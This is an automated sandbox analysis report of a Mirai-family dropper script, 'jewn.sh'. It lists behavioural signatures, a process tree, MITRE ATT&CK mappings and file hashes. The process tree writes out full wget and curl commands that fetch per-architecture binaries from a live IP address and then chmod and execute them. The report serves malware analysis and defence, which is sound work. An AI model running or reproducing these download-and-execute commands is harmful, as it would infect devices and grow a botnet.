Analysis
-
max time kernel
109s -
max time network
150s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
06/12/2024, 13:19
Static task
static1
Behavioral task
behavioral1
Sample
jewn.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
jewn.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
jewn.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
jewn.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
jewn.sh
-
Size
1KB
-
MD5
49377a7c5220a2e428c4ff6898fcd50c
-
SHA1
0d2843613a97cc150c539474b2db2ff741260997
-
SHA256
336fc216d10d88ac069d22db53159229050040ff570e610ddcca11040e666a4c
-
SHA512
51189375074dc361c0b855ae89774e7888a0a3360bd8291f2d99ba2bc8de4cdf8a2307044d8aee9d9459973f2e29b5d866b7b004e7df754688324a207d77b342
Malware Config
Extracted
mirai
KURC
Extracted
mirai
KURC
Extracted
mirai
KURC
Signatures
-
Mirai family
-
Contacts a large (106332) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 826 chmod 670 chmod 685 chmod 732 chmod 761 chmod 810 chmod 712 chmod 739 chmod 783 chmod 794 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/jewn 671 jewn /tmp/jewn 686 jewn /tmp/jewn 715 jewn /tmp/jewn 733 jewn /tmp/jewn 740 jewn /tmp/jewn 762 jewn /tmp/jewn 784 jewn /tmp/jewn 796 jewn /tmp/jewn 811 jewn /tmp/jewn 827 jewn -
Modifies Watchdog functionality 1 TTPs 10 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog jewn File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/misc/watchdog jewn -
Enumerates active TCP sockets 1 TTPs 4 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn -
Writes file to system bin folder 10 IoCs
description ioc Process File opened for modification /bin/watchdog jewn File opened for modification /bin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /bin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /bin/watchdog jewn File opened for modification /bin/watchdog jewn -
Changes its process name 5 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself czDp(7 762 jewn Changes the process name, possibly in an attempt to hide itself ozeFEyzjwFzrfdgw 784 jewn Changes the process name, possibly in an attempt to hide itself yjxrrzCgtwDbBskx4 796 jewn Changes the process name, possibly in an attempt to hide itself mfgutorC% 811 jewn Changes the process name, possibly in an attempt to hide itself cFqjvfzvhacg) 827 jewn -
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads system network configuration 1 TTPs 4 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/1/fd jewn File opened for reading /proc/297/fd jewn File opened for reading /proc/265/fd jewn File opened for reading /proc/140/fd jewn File opened for reading /proc/804/fd jewn File opened for reading /proc/284/fd jewn File opened for reading /proc/639/fd jewn File opened for reading /proc/284/fd jewn File opened for reading /proc/299/fd jewn File opened for reading /proc/802/fd jewn File opened for reading /proc/589/fd jewn File opened for reading /proc/self/auxv curl File opened for reading /proc/668/fd jewn File opened for reading /proc/262/fd jewn File opened for reading /proc/593/fd jewn File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/815/fd jewn File opened for reading /proc/269/fd jewn File opened for reading /proc/589/fd jewn File opened for reading /proc/self/auxv curl File opened for reading /proc/263/fd jewn File opened for reading /proc/591/fd jewn File opened for reading /proc/265/fd jewn File opened for reading /proc/1/fd jewn File opened for reading /proc/205/fd jewn File opened for reading /proc/205/fd jewn File opened for reading /proc/644/fd jewn File opened for reading /proc/140/fd jewn File opened for reading /proc/205/fd jewn File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/262/fd jewn File opened for reading /proc/297/fd jewn File opened for reading /proc/166/fd jewn File opened for reading /proc/self/auxv curl File opened for reading /proc/594/fd jewn File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/573/fd jewn File opened for reading /proc/589/fd jewn File opened for reading /proc/573/fd jewn File opened for reading /proc/644/fd jewn File opened for reading /proc/205/fd jewn File opened for reading /proc/639/fd jewn File opened for reading /proc/1/fd jewn File opened for reading /proc/591/fd jewn File opened for reading /proc/318/fd jewn File opened for reading /proc/166/fd jewn File opened for reading /proc/284/fd jewn File opened for reading /proc/318/fd jewn File opened for reading /proc/593/fd jewn File opened for reading /proc/297/fd jewn File opened for reading /proc/791/fd jewn File opened for reading /proc/262/fd jewn File opened for reading /proc/818/fd jewn File opened for reading /proc/644/fd jewn File opened for reading /proc/self/auxv curl File opened for reading /proc/573/fd jewn File opened for reading /proc/639/fd jewn File opened for reading /proc/593/fd jewn File opened for reading /proc/166/fd jewn File opened for reading /proc/self/auxv curl File opened for reading /proc/594/fd jewn File opened for reading /proc/310/fd jewn -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 674 wget 675 curl 684 cat -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jew.mips wget File opened for modification /tmp/jew.mpsl curl File opened for modification /tmp/jew.arm6 wget File opened for modification /tmp/jew.arm6 curl File opened for modification /tmp/jew.arm7 curl File opened for modification /tmp/jew.ppc curl File opened for modification /tmp/jew.sh4 wget File opened for modification /tmp/jew.x86 wget File opened for modification /tmp/jew.sh4 curl File opened for modification /tmp/jew.m68k curl File opened for modification /tmp/jewn jewn.sh File opened for modification /tmp/jew.arm7 wget File opened for modification /tmp/jew.arm4 curl File opened for modification /tmp/jew.mips curl File opened for modification /tmp/jew.mpsl wget File opened for modification /tmp/jew.arm5 wget File opened for modification /tmp/jew.arm5 curl File opened for modification /tmp/jew.ppc wget File opened for modification /tmp/jew.m68k wget File opened for modification /tmp/jew.x86 curl
Processes
-
/tmp/jewn.sh/tmp/jewn.sh1⤵
- Writes file to tmp directory
PID:639 -
/usr/bin/wgetwget http://93.123.85.78/bins/jew.x862⤵
- Writes file to tmp directory
PID:641
-
-
/usr/bin/curlcurl -O http://93.123.85.78/bins/jew.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:659
-
-
/bin/catcat jew.x862⤵PID:669
-
-
/bin/chmodchmod +x jewn jewn.sh jew.x86 systemd-private-56885e0d8a02455a9d549f43410b2516-systemd-timedated.service-Z4x0J72⤵
- File and Directory Permissions Modification
PID:670
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
PID:671
-
-
/usr/bin/wgetwget http://93.123.85.78/bins/jew.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:674
-
-
/usr/bin/curlcurl -O http://93.123.85.78/bins/jew.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:675
-
-
/bin/catcat jew.mips2⤵
- System Network Configuration Discovery
PID:684
-
-
/bin/chmodchmod +x jew.mips jewn jewn.sh jew.x86 systemd-private-56885e0d8a02455a9d549f43410b2516-systemd-timedated.service-Z4x0J72⤵
- File and Directory Permissions Modification
PID:685
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
PID:686
-
-
/usr/bin/wgetwget http://93.123.85.78/bins/jew.mpsl2⤵
- Writes file to tmp directory
PID:689
-
-
/usr/bin/curlcurl -O http://93.123.85.78/bins/jew.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:698
-
-
/bin/catcat jew.mpsl2⤵PID:711
-
-
/bin/chmodchmod +x jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-56885e0d8a02455a9d549f43410b2516-systemd-timedated.service-Z4x0J72⤵
- File and Directory Permissions Modification
PID:712
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
PID:715
-
-
/usr/bin/wgetwget http://93.123.85.78/bins/jew.arm42⤵PID:718
-
-
/usr/bin/curlcurl -O http://93.123.85.78/bins/jew.arm42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:724
-
-
/bin/catcat jew.arm42⤵PID:730
-
-
/bin/chmodchmod +x jew.arm4 jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-56885e0d8a02455a9d549f43410b2516-systemd-timedated.service-Z4x0J72⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
PID:733
-
-
/usr/bin/wgetwget http://93.123.85.78/bins/jew.arm52⤵
- Writes file to tmp directory
PID:734
-
-
/usr/bin/curlcurl -O http://93.123.85.78/bins/jew.arm52⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:737
-
-
/bin/catcat jew.arm52⤵PID:738
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-56885e0d8a02455a9d549f43410b2516-systemd-timedated.service-Z4x0J72⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
PID:740
-
-
/usr/bin/wgetwget http://93.123.85.78/bins/jew.arm62⤵
- Writes file to tmp directory
PID:741
-
-
/usr/bin/curlcurl -O http://93.123.85.78/bins/jew.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:747
-
-
/bin/catcat jew.arm62⤵PID:759
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.arm6 jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-56885e0d8a02455a9d549f43410b2516-systemd-timedated.service-Z4x0J72⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
PID:762
-
-
/usr/bin/wgetwget http://93.123.85.78/bins/jew.arm72⤵
- Writes file to tmp directory
PID:766
-
-
/usr/bin/curlcurl -O http://93.123.85.78/bins/jew.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:777
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-56885e0d8a02455a9d549f43410b2516-systemd-timedated.service-Z4x0J72⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:784
-
-
/usr/bin/wgetwget http://93.123.85.78/bins/jew.ppc2⤵
- Writes file to tmp directory
PID:789
-
-
/usr/bin/curlcurl -O http://93.123.85.78/bins/jew.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:792
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.x86 systemd-private-56885e0d8a02455a9d549f43410b2516-systemd-timedated.service-Z4x0J72⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:796
-
-
/usr/bin/wgetwget http://93.123.85.78/bins/jew.m68k2⤵
- Writes file to tmp directory
PID:805
-
-
/usr/bin/curlcurl -O http://93.123.85.78/bins/jew.m68k2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:808
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.m68k jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.x862⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:811
-
-
/usr/bin/wgetwget http://93.123.85.78/bins/jew.sh42⤵
- Writes file to tmp directory
PID:816
-
-
/usr/bin/curlcurl -O http://93.123.85.78/bins/jew.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.m68k jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.sh4 jew.x862⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:827
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60KB
MD5ec9bf54e29277d9028ea800cf3cf7501
SHA1371485bf2f9f86e25e618fcb98071b3f6c8524a8
SHA25619385e38460e0a288e81bdcbb75e7ad23f747d5163ba276ec996bc53db3a11d2
SHA51287e2fd37cead67b3e43a9b18c0c43b702ba6ecee6d1de3be60d7bf778218c872b417a693205172a2c4ad368c9ffdfe5f7dcd6ff6a0868ad946dbe5cc9e727da9
-
Filesize
125KB
MD5c5ac3c0d137d7a994fb24f0d05335848
SHA11aca371b36bf8170bdc06e7014a5aef1c89ac0d9
SHA256bd1585f0afe62dc9966151ce8f722958b21846e3a164dad19cf266a14bb5075d
SHA5122dd5eedb9f9e1967db8a8025435f4bd9781592342e27ee66dd64c3ed63ec688b83adaff3995cece7f59c7acb68d93bcd2fbbdce35b94e318b9a955cb0dd64c80
-
Filesize
118KB
MD57987a5e42d1c90453c28ccd9ed89c03e
SHA1629a14c862594d2cea7e09e26c5da9805ce7274b
SHA25697e0d7a8e3c63baa4512449645728f4f1b62ee804959f8ab4123f439f8b14f77
SHA51244492d04c00060c961d0d717bbfa2ffd04b81b97ef34c480dc71d72fa4af51f031384d1d0161f0d6b9ec86471c3bc9e705c5b0af3a75b3a447a9beae8730327a
-
Filesize
211B
MD5bf7b89e47bae293118c020c809c6b64f
SHA10ce398102e0add27eae4027b8785e1a925d44d5d
SHA256d299a926576581b97be372dd08ea722eb47e9d634b5a07669993b42efbc1a5bd
SHA5123ddf7c5a29121f52f3bf2023a86b9f1787ac2e4cd2691d441528e7889868a1c4d97c153f1d1b6ea4a86fb7b2a9cad9888324dcdf92390c8932e17ba486a54409
-
Filesize
50KB
MD55a9f4fe4dc534502de24b5a693c90f1c
SHA1854f4d1fd83615af2205c5024521f4c335d36cc8
SHA256fb4cb7c328369faf2ad09dfb90db1638692e62974a0b07b95f29ca1411c8e39f
SHA512998e7c8201762a388f689a00bcdcafcd33ac3c4ac0a6d88509c9de792ef72d47e79a75571aab58611848599370c335adf5792e14fe87e2474ff36d00a74908ce
-
Filesize
74KB
MD550ccc4094919b90c09d316f111c8e458
SHA1299bead6bb02f8dddeec6b32e7f597ed2401caf6
SHA25618029dcf1c9f4de253b3efca431386294bb6bfc45edb05487a786eab6f0f664e
SHA51283fcfe786f50264e1931615c39c2cf7330f297177f9c8d3c3c17d72ca629e598b6fd263dd515ba17053255122439bd8df5a75cf1b16e6ab8ebfa15dbf70474d1